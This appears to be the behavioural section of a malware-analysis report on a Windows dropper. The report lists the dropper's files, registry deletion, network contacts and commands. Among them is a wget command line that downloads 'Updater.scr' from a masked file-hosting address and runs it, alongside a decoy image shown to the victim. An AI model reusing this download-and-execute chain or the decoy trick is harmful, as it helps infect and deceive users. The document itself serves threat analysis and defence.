Technical Information
- '%TEMP%\Updater.scr'
- '%TEMP%\wget.exe' -c "http://dl.#####oxusercontent.com/u/62173443/Updater.scr" -O "%TEMP%\Updater.scr"
- '%TEMP%\wget.exe' /
- '%TEMP%\Updater.scr' (downloaded from the Internet)
- '<SYSTEM32>\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00" /f
- '<SYSTEM32>\attrib.exe' -s -h "%TEMP%\wget.exe"
- '<SYSTEM32>\attrib.exe' -s -h ""%TEMP%\get.cmd""
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\get.cmd" "
- '<SYSTEM32>\chcp.com' 1251
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen %TEMP%\Birthday.gif
- %TEMP%\get.cmd
- %TEMP%\wget.exe
- %TEMP%\Updater.scr
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\Birthday.gif
- %TEMP%\$inst\2.tmp
- %TEMP%\wget.exe
- %TEMP%\$inst\temp_0.tmp
- 'dl.#####oxusercontent.com':80
- dl.#####oxusercontent.com/u/62173443/Updater.scr
- DNS ASK dl.#####oxusercontent.com
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'